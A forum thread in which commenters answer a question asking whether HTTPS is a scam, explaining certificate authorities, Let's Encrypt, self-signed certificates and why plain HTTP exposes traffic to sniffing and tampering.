Is HTTPS a scam?

No it's not.

And it's not really like the TSA on the airport. It's more like a "having a door on your plane" type of security.

This is the best analogy I've ever read in the subject, bravo.
What if the issuer of the security certificate started charging you $1000 a year?

Why wouldn't they?
- Letsencrypt certs are free dude. Https literally costs you nothing.
- I'd switch to another certificate provider ...
- Not THE issuer. AN issuer. All of your devices have a number of trusted top-level issuers (Root certification authorities). Windows has about 50 preloaded, and this list largely matches what you'll find on Android, Mac, etc. Everyone's been mentioning Let's Encrypt, which descends from ISRG Root X1. But you can (relatively) easily get certs from Thawte, Verisign, and many others.
  
  And if none of those are to your liking, you can install your own. Seriously, there's nothing technical stopping you. Most corporate devices (Windows, Mac, Linux; Android or iOS; mobile, client, server) have the company's root certs installed. The challenge for public trust is exactly that- Trust. You must operate in a way that is generally trustworthy.
  
  Let's Encrypt was actually pretty revolutionary. You aren't entirely off base with your concern. Prior to that, getting a cert that was trusted by most devices was non-trivial, and came with an expense. But that wasn't because of the desire for encryption. Rather, it was about verifying that you were who you said you were. These also served as proof of identity.
- Some do. It depends on the type of certificate. Thankfully now we have LetsEncrypt so that there is a free alternative to the big CAs.
  
  To answer your initial question - yes it is necessary. Without HTTPS or encryption in general, anybody who can intercept your connection can see everything you're doing.
  
  A real world example of this is let's say you're connected to a WiFi network that has no password and are browsing a plain HTTP site. Open wifi networks are unencrypted, as is HTTP.
  
  I can sit across the road in a vehicle, unseen, on a laptop and sniff the traffic to view what you're doing. If you log into your bank, I now have your credentials and can do what I like, and you don't even know.
  
  This is why we need encryption. It is an (almost) guarantee that your traffic is only viewable to yourself and the other end of whatever you're connecting to and not anyone in the middle.
  
  Edit: for Anyone downvoting OP remember this is nostupidquestions. Take the time to educate if you know better but don't downvote "stupid" questions lol.

Go ahead, submit your credit card details in plain text. I'm sure nothing bad will happen.

All I see is **** **** **** ****
But 99% of us with websites don't take credit card numbers.
- Do you take login credentials that could be skimmed and used for identity theft?
  
  Maybe this one will strike home for people who think it’s a scam by The Man:
  
  With no HTTPS, every single thing you do on the web can be monitored by your ISP’s automated tracking system and sold to data warehouses that then sell the data on to AI aggregators who can profile your activity to figure out how to shape your future behaviour based on how you responded in the past.
  
  And HTTPS isn’t just about protecting secrets, it’s about validating the communication channel hasn’t been tampered with. Without it, anyone between you and your destination could be modifying what actually gets sent back to you, injecting anything from malware to slight changes in text content based on the above profiling info.
  
  HTTPS is part of what keeps the web free and federated.

No.

HTTP is like using a postcard, HTTPS is using a sealed envelope. Which would you use for your bank information?

The "third party gatekeeper" does more than just secure data, it also acts as a validation that your site is what it says it is. So if someone jacks your domain out from under you and hosts something totally different, people can tell that something's up.

99% of us with websites never touch bank information.
- But would you be OK taking all the stuff you write on those websites, and scrawling it on a giant chalkboard in your town square instead? One where anyone can see (or even change) what you've written?
- And http still works in any browser I know of.
  
  I kind of get your frustration though. I set up my personal website precisely to get away from big platforms; yet my HTTPS is validated by Google. It feels like a defeat still having them involved in the process.

No, it is not a scam or like the TSA. (... which is of much less clear benefit, but that's a different story.)

Security that we never needed before, but now suddenly we do.

How do you figure? Dropping unsafe practices earlier would've been a great idea, it was just another item in the long list of "people suck at technology", that stuck around out of habit and sloppiness. HTTPS is not new, but for a long time it was much more acceptable to deal with plain unsafe solutions for many uses. Since setting up an HTTPS site for free got very, very easy, there just weren't many excuses left.

Now we’re dependent on a third party gatekeeper for permission to have a web site.

Sort of. By necessity, in a chain of trust, the buck has to stop somewhere, that's your root "authority". In some cases you just make your own on the logic that you trust yourself, or accept some other cert/authority as trusted, or tell the browser "yeah whatever, I know what I'm doing" if you know it's safe. The catch is that then, for any number of reasons, you can't necessarily know it's safe.

It’s a move by the weasels-that-be to turn the Internet into yet another tool for profit and control.

No offense, are you sure you have the technical background required to know that?

Websites were already dependent on third parties for domain registration in the first place, so OPs complaint about cert authorities makes less sense.
- Good parallel. Trusting DNS with interpreting a hostname is not all that different from trusting CAs about whom else you should trust.

The problem with TSA is that it reduces our privacy and dignity in exchange for security (that security may be theatre). HTTPS is different because it increases privacy which allows us to keep more dignity (security that is not theatre.)

TSA is like needing to strip so that your clothes don't get wet while going out in the rain, while HTTPS is like wearing a raincoat so your clothes don't get wet while going out in the rain.

Bruh it's been here for well over two decades.

That's too long a run-up for a scam.

Not sure I get this one. You can still run a website with http. Now it might alarm the browser and users. But you can do it.

As for certificates being free but maybe not now. It's actually the other way round. As I recall when https was pretty new the main way was via verisign, and it was not cheap to get one.

The fact you could later get one for free for example via letsencrypt is what made it so everyone could run https (along with the changes that allow multiple certs on a single server with multiple domains).

If it became expensive to get certs again I'd bet a lot of hobbyist stuff would go back to http or self signed and browsers would need to tone down the warning. But, I cannot imagine that happening now. Having most sites encrypted is a good thing.

It's defenitively not a scam. It does exactly ehat it should and is pretty good at it.

However, especially google is pushing it on everything, even when they are not needed. Punishing search results if they don't enforce https, make it hard to access sites in chrome etc.

I have a static website that takes no user input whatsoever, thus https is pointless and a waste of compute power/energy.

In the end I see the biggest issue in not very tech literate useres thinking everything with https is legit and trustworrhy, while it really isn't.

Now we’re dependent on a third party gatekeeper for permission to have a web site.

Source ?

Even though most browser would return an alarm in case of "self signed certificate" you can still do-it, and it's still more secure than non encryption

Source ?

I refer to the issuer of the security certificate
- That's not how security certificates work

Your problem seems to be with cert authorities, which is not the same as HTTPS.

I'd be interested in what your solution is that doesn't rely upon a 3rd party to guarantee that a website is ran by who it says it is.

Also if you're complaining that browsers warn the user when using http, that's a complaint about the browser, not HTTPS.

I'd consider my internet browsing unknowingly being snooped on or having content injected as a benefit and not a scam.

The latest post from the Electronic Frontier Foundation, a digital freedom and privacy advocacy group touches on HTTPS, and how HTTPS becoming the norm is an improvement on privacy compared to the past.

Permanently Deleted

no.

I understand the issue of big tech being the authority, but I also see the benefit of hiding my data from ISP and snooping. There are practical p2p ways to make this work or even a federated authenticator but we are probably stuck with https for a long while yet